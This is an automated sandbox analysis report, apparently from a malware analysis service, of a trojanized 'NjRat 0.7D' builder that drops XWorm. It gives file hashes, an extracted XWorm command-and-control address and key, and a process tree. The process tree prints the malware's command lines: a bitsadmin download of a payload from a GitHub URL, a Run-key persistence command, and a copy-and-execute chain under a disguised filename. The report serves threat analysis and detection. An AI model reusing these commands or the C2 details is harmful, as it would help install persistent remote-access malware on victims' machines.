Analysis
- max time kernel: 147s
- max time network: 151s
- platform: windows7_x64
- resource: win7-20240708-en
- resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
- submitted: 09-08-2024 10:24
Behavioral task: behavioral1
Sample: NjRat.0.7D-main/NjRat.0.7D/NjRat 0.7D.exe
Resource: win7-20240708-en
General
- Target: NjRat.0.7D-main/NjRat.0.7D/NjRat 0.7D.exe
- Size: 8.9MB
- MD5: 3e8dc9ba82863bd3c1e5ec769d2c187f
- SHA1: fa80a09b2a6804868c26dbeb62b073d1546a132b
- SHA256: 6f4fb430fc36355253eff73a164d147ad1fa17dc9c62dba0984d003e1db74880
- SHA512: 10e375f93a01925833c3199889afe889f8f83422a4aee8b21cddda65f5436184693d7156b9ae46be1fc25ef886d07af5fe9db15c297b7e58d8faea965151234c
- SSDEEP: 196608:pG2cZZTlJT3BGzYRR/x8i1hDs79+wPUy07BtOxmgVfMpobGHCWhyn:82cXTlJT37RRKi1169+xy0DOxHVf7bGm
Malware Config
Extracted
xworm
83.143.112.30:3096
Dza3YLL2q2qcgzdH
Signatures
-
Detect Xworm Payload 5 IoCs
Processes (resource, yara_rule):
- behavioral1/memory/496-37-0x0000000000400000-0x0000000000414000-memory.dmp: family_xworm
- behavioral1/memory/496-39-0x0000000000400000-0x0000000000414000-memory.dmp: family_xworm
- behavioral1/memory/496-42-0x0000000000400000-0x0000000000414000-memory.dmp: family_xworm
- behavioral1/memory/496-44-0x0000000000400000-0x0000000000414000-memory.dmp: family_xworm
- behavioral1/memory/496-43-0x0000000000400000-0x0000000000414000-memory.dmp: family_xworm
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Executes dropped EXE 5 IoCs
Processes (pid, process):
- 2440 NjRat 0.7D.exe
- 3060 audiodg.exe
- 1944 Isolation graphique de périphérique audio Windows .exe
- 2316 WatchDog.exe
- 1728 WatchDog.exe
-
Loads dropped DLL 2 IoCs
Processes (pid, process):
- 1944 Isolation graphique de périphérique audio Windows .exe
- 2316 WatchDog.exe
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes (description, ioc, process):
- Set value (str): \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\audiodg = "C:\\Windows\\Isolation graphique de périphérique audio Windows .exe" (reg.exe)
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
Processes (description, pid, process, target process):
- PID 1944 set thread context of 496: 1944 Isolation graphique de périphérique audio Windows .exe -> InstallUtil.exe
-
Drops file in Windows directory 2 IoCs
Processes (description, ioc, process):
- File created: C:\Windows\Isolation graphique de périphérique audio Windows .exe (cmd.exe)
- File opened for modification: C:\Windows\Isolation graphique de périphérique audio Windows .exe (cmd.exe)
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes (description, ioc, process):
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (audiodg.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (cmd.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (PING.EXE)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (reg.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (Isolation graphique de périphérique audio Windows .exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (WatchDog.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (WatchDog.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (NjRat 0.7D.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (cmd.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (PING.EXE)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (PING.EXE)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (InstallUtil.exe)
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 5 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes (pid, process):
- 2896 cmd.exe
- 2708 PING.EXE
- 1160 cmd.exe
- 2576 PING.EXE
- 2000 PING.EXE
-
Runs ping.exe 1 TTPs 3 IoCs
Processes (pid, process):
- 2708 PING.EXE
- 2576 PING.EXE
- 2000 PING.EXE
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes (pid, process):
- 496 InstallUtil.exe
-
Suspicious behavior: EnumeratesProcesses 16 IoCs
Processes (pid, process; repeated rows collapsed with a count):
- 3060 audiodg.exe (6 events)
- 1944 Isolation graphique de périphérique audio Windows .exe (4 events)
- 2316 WatchDog.exe (1 event)
- 1728 WatchDog.exe (3 events)
- 1944 Isolation graphique de périphérique audio Windows .exe (2 events)
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes (description, pid, process):
- Token: SeDebugPrivilege, 3060 audiodg.exe
- Token: SeDebugPrivilege, 1944 Isolation graphique de périphérique audio Windows .exe
- Token: SeDebugPrivilege, 496 InstallUtil.exe
- Token: SeDebugPrivilege, 2316 WatchDog.exe
- Token: SeDebugPrivilege, 1728 WatchDog.exe
-
Suspicious use of FindShellTrayWindow 1 IoCs
Processes (pid, process):
- 2440 NjRat 0.7D.exe
-
Suspicious use of SendNotifyMessage 1 IoCs
Processes (pid, process):
- 2440 NjRat 0.7D.exe
-
Suspicious use of WriteProcessMemory 62 IoCs
Processes (description, pid, process, target process; repeated rows collapsed with a count):
- PID 784 wrote to memory of 2440: 784 NjRat 0.7D.exe -> NjRat 0.7D.exe (4 events)
- PID 784 wrote to memory of 1920: 784 NjRat 0.7D.exe -> WScript.exe (3 events)
- PID 784 wrote to memory of 3060: 784 NjRat 0.7D.exe -> audiodg.exe (4 events)
- PID 1920 wrote to memory of 2696: 1920 WScript.exe -> bitsadmin.exe (3 events)
- PID 3060 wrote to memory of 2896: 3060 audiodg.exe -> cmd.exe (4 events)
- PID 2896 wrote to memory of 2708: 2896 cmd.exe -> PING.EXE (4 events)
- PID 3060 wrote to memory of 1160: 3060 audiodg.exe -> cmd.exe (4 events)
- PID 1160 wrote to memory of 2576: 1160 cmd.exe -> PING.EXE (4 events)
- PID 2896 wrote to memory of 2100: 2896 cmd.exe -> reg.exe (4 events)
- PID 1160 wrote to memory of 2000: 1160 cmd.exe -> PING.EXE (4 events)
- PID 1160 wrote to memory of 1944: 1160 cmd.exe -> Isolation graphique de périphérique audio Windows .exe (4 events)
- PID 1944 wrote to memory of 496: 1944 Isolation graphique de périphérique audio Windows .exe -> InstallUtil.exe (12 events)
- PID 1944 wrote to memory of 2316: 1944 Isolation graphique de périphérique audio Windows .exe -> WatchDog.exe (4 events)
- PID 2316 wrote to memory of 1728: 2316 WatchDog.exe -> WatchDog.exe (4 events)
Processes (the number in parentheses is the depth in the process tree)
(1) C:\Users\Admin\AppData\Local\Temp\NjRat.0.7D-main\NjRat.0.7D\NjRat 0.7D.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\NjRat.0.7D-main\NjRat.0.7D\NjRat 0.7D.exe"
    Signatures:
    - Suspicious use of WriteProcessMemory
    PID: 784
  (2) C:\Users\Admin\AppData\Local\Temp\NjRat 0.7D.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\NjRat 0.7D.exe"
      Signatures:
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
      PID: 2440
  (2) C:\Windows\System32\WScript.exe
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\install.vbs"
      Signatures:
      - Suspicious use of WriteProcessMemory
      PID: 1920
    (3) C:\Windows\System32\bitsadmin.exe
        Command line: "C:\Windows\System32\bitsadmin.exe" /transfer myDownloadJob /download /priority normal https://raw.githubusercontent.com/BlackAll9/rrr/main/MicrosoftEdge.rar C:\Users\Admin\AppData\Roaming\MicrosoftEdge.rar
        Signatures:
        - Download via BitsAdmin
        PID: 2696
  (2) C:\Users\Admin\AppData\Roaming\audiodg.exe
      Command line: "C:\Users\Admin\AppData\Roaming\audiodg.exe"
      Signatures:
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 3060
    (3) C:\Windows\SysWOW64\cmd.exe
        Command line: "cmd" /c ping 127.0.0.1 -n 8 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg" /t REG_SZ /d "C:\Windows\Isolation graphique de périphérique audio Windows .exe"
        Signatures:
        - System Location Discovery: System Language Discovery
        - System Network Configuration Discovery: Internet Connection Discovery
        - Suspicious use of WriteProcessMemory
        PID: 2896
      (4) C:\Windows\SysWOW64\PING.EXE
          Command line: ping 127.0.0.1 -n 8
          Signatures:
          - System Location Discovery: System Language Discovery
          - System Network Configuration Discovery: Internet Connection Discovery
          - Runs ping.exe
          PID: 2708
      (4) C:\Windows\SysWOW64\reg.exe
          Command line: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg" /t REG_SZ /d "C:\Windows\Isolation graphique de périphérique audio Windows .exe"
          Signatures:
          - Adds Run key to start application
          - System Location Discovery: System Language Discovery
          PID: 2100
    (3) C:\Windows\SysWOW64\cmd.exe
        Command line: "cmd" /c ping 127.0.0.1 -n 13 > nul && copy "C:\Users\Admin\AppData\Roaming\audiodg.exe" "C:\Windows\Isolation graphique de périphérique audio Windows .exe" && ping 127.0.0.1 -n 13 > nul && "C:\Windows\Isolation graphique de périphérique audio Windows .exe"
        Signatures:
        - Drops file in Windows directory
        - System Location Discovery: System Language Discovery
        - System Network Configuration Discovery: Internet Connection Discovery
        - Suspicious use of WriteProcessMemory
        PID: 1160
      (4) C:\Windows\SysWOW64\PING.EXE
          Command line: ping 127.0.0.1 -n 13
          Signatures:
          - System Location Discovery: System Language Discovery
          - System Network Configuration Discovery: Internet Connection Discovery
          - Runs ping.exe
          PID: 2576
      (4) C:\Windows\SysWOW64\PING.EXE
          Command line: ping 127.0.0.1 -n 13
          Signatures:
          - System Location Discovery: System Language Discovery
          - System Network Configuration Discovery: Internet Connection Discovery
          - Runs ping.exe
          PID: 2000
      (4) C:\Windows\Isolation graphique de périphérique audio Windows .exe
          Command line: "C:\Windows\Isolation graphique de périphérique audio Windows .exe"
          Signatures:
          - Executes dropped EXE
          - Loads dropped DLL
          - Suspicious use of SetThreadContext
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          PID: 1944
        (5) C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
            Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
            Signatures:
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: AddClipboardFormatListener
            - Suspicious use of AdjustPrivilegeToken
            PID: 496
        (5) C:\Users\Admin\AppData\Local\Temp\WatchDog.exe
            Command line: "C:\Users\Admin\AppData\Local\Temp\WatchDog.exe"
            Signatures:
            - Executes dropped EXE
            - Loads dropped DLL
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            PID: 2316
          (6) C:\Users\Admin\AppData\Local\Temp\WatchDog.exe
              Command line: "C:\Users\Admin\AppData\Local\Temp\WatchDog.exe"
              Signatures:
              - Executes dropped EXE
              - System Location Discovery: System Language Discovery
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
              PID: 1728
Network
MITRE ATT&CK Enterprise v15
Persistence
- BITS Jobs (1)
- Boot or Logon Autostart Execution (1)
- Registry Run Keys / Startup Folder (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
- Registry Run Keys / Startup Folder (1)
Downloads
-
Filesize: 8.5MB
MD5: 70ea9c044c9a766330d3fe77418244a5
SHA1: 18602d0db52917b88cbdab84ba89181e6fd4686a
SHA256: b78fb092e151db613cba51d7f2532547e48c6f4712809a485f272e2ab55776a5
SHA512: 5261865e7ca21e928b956a97518366c9dc218a2312961e0ba0b72b37ae7c797176382de3c3dc1d2949aca51c3db330562f1087a71efdc7c3c3b8f8928872f917
-
Filesize: 78B
MD5: d8d402e89dfd0d68ef74f1e5eb908783
SHA1: f1316ea2a1ab57d60c3778dd568f558842a0ad59
SHA256: 9d5cc20e40bddf63d32620611667ddc3d9cbfacc5a4f10aeddc533822a0819cd
SHA512: 790e8d9b23ff6981e4e7fed1ea5cd18aab23ce8ac731c974df88d2e433d27331f28e12a187cf114ddbaf513acea3c4cb1a2dbfa1ed226a884b707915adf894b4
-
Filesize: 81B
MD5: aa2ba3f6b3c72fb0d31377de02638170
SHA1: a2eb4f466a4b312c014c39cd7537b3da6f113561
SHA256: 4b9e8ff63430de858de9fc7e51f32500b6f7c235fea9de777481ef590eafb607
SHA512: e5665bbf169432c1128149fbcd831ea9e27185be32c4548e919d66e4f642f0ca11ce29d2d6aa3cfe3c55420d159b47db483115f0e99ee2379e9904f7f1f163df
-
Filesize: 355KB
MD5: d9dfa8ba182529445890b5021e159b77
SHA1: 64f8724f8cd76adff12364e6bb2fc9eaceadb1ba
SHA256: 60df809a613aab714e2edad3338500a081fbae866cee3a4a3113abed60f5d59f
SHA512: d18f5d13d5ea4226e309fe7d5b59eac5770f391b92c5a03e0f14cd5e23a45b75ed2353e7a388198162061686d9c4675e11428d0362a01b7e05a0b4638fb10803
-
Filesize: 19KB
MD5: 4724c9dce57bc0472ed610ba16d08894
SHA1: d5fea3520146ccbf54c31b3b4868de499022fb37
SHA256: aaf7bddca268a157d995df03454ba4d15df36c6b717ebc7fb018e3c5101ef2fb
SHA512: d1ec126257698cecfcebf3db17c910b33a231d08d955a4659ed417e1c115976506e1bd55db463c0e1414e39e6f90f11b20ab2110048bd947e51d9473db292b18
-
Filesize: 76KB
MD5: 0e362e7005823d0bec3719b902ed6d62
SHA1: 590d860b909804349e0cdc2f1662b37bd62f7463
SHA256: 2d0dc6216f613ac7551a7e70a798c22aee8eb9819428b1357e2b8c73bef905ad
SHA512: 518991b68496b3f8545e418cf9b345e0791e09cc20d177b8aa47e0aba447aa55383c64f5bdaca39f2b061a5d08c16f2ad484af8a9f238ca23ab081618fba3ad3